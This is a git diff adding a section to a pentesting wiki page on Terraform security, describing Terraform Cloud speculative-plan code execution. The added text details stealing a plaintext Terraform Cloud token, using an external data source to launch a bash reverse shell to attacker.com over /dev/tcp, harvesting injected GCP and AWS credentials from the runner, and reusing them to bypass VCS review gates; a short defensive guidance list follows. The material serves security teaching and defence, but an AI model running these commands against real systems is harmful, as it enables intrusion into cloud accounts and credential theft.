diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md index c1b4c6a67f..76b446bd89 100644 --- a/src/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md @@ -217,6 +217,94 @@ data "external" "example" { } ``` +## Terraform Cloud speculative plan RCE and credential exfiltration + +This scenario abuses Terraform Cloud (TFC) runners during speculative plans to pivot into the target cloud account. + +- Preconditions: + - Steal a Terraform Cloud token from a developer machine. The CLI stores tokens in plaintext at `~/.terraform.d/credentials.tfrc.json`. + - The token must have access to the target organization/workspace and at least the `plan` permission. VCS-backed workspaces block `apply` from CLI, but still allow speculative plans. + +- Discover workspace and VCS settings via the TFC API: + +```bash +export TF_TOKEN= +curl -s -H "Authorization: Bearer $TF_TOKEN" \ + https://app.terraform.io/api/v2/organizations//workspaces/ | jq +``` + +- Trigger code execution during a speculative plan using the external data source and the Terraform Cloud "cloud" block to target the VCS-backed workspace: + +```hcl +terraform { + cloud { + organization = "acmecorp" + workspaces { name = "gcp-infra-prod" } + } +} + +data "external" "exec" { + program = ["bash", "./rsync.sh"] +} +``` + +Example rsync.sh to obtain a reverse shell on the TFC runner: + +```bash +#!/usr/bin/env bash +bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1' +``` + +Run a speculative plan to execute the program on the ephemeral runner: + +```bash +terraform init +terraform plan +``` + +- Enumerate and exfiltrate injected cloud credentials from the runner. During runs, TFC injects provider credentials via files and environment variables: + +```bash +env | grep -i gcp || true +env | grep -i aws || true +``` + +Expected files on the runner working directory: +- GCP: + - `tfc-google-application-credentials` (Workload Identity Federation JSON config) + - `tfc-gcp-token` (short-lived GCP access token) +- AWS: + - `tfc-aws-shared-config` (web identity/OIDC role assumption config) + - `tfc-aws-token` (short-lived token; some orgs may use static keys) + +- Use the short-lived credentials out-of-band to bypass VCS gates: + +GCP (gcloud): + +```bash +export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials +gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS" +gcloud config set project +``` + +AWS (AWS CLI): + +```bash +export AWS_CONFIG_FILE=./tfc-aws-shared-config +export AWS_PROFILE=default +aws sts get-caller-identity +``` + +With these creds, attackers can create/modify/destroy resources directly using native CLIs, sidestepping PR-based workflows that block `apply` via VCS. + +- Defensive guidance: + - Apply least privilege to TFC users/teams and tokens. Audit memberships and avoid oversized owners. + - Restrict `plan` permission on sensitive VCS-backed workspaces where feasible. + - Enforce provider/data source allowlists with Sentinel policies to block `data "external"` or unknown providers. See HashiCorp guidance on provider filtering. + - Prefer OIDC/WIF over static cloud credentials; treat runners as sensitive. Monitor speculative plan runs and unexpected egress. + - Detect exfiltration of `tfc-*` credential artifacts and alert on suspicious `external` program usage during plans. + + ## Automatic Audit Tools ### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) @@ -322,8 +410,13 @@ brew install terrascan - [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) - [https://github.com/offensive-actions/terraform-provider-statefile-rce](https://github.com/offensive-actions/terraform-provider-statefile-rce) +- [Terraform Cloud token abuse turns speculative plan into remote code execution](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/) +- [Terraform Cloud permissions](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions) +- [Terraform Cloud API – Show workspace](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace) +- [AWS provider configuration](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration) +- [AWS CLI – OIDC role assumption](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc) +- [GCP provider – Using Terraform Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud) +- [Terraform – Sensitive variables](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables) +- [Snyk Labs – Gitflops: dangers of Terraform automation platforms](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/) {{#include ../banners/hacktricks-training.md}} - - -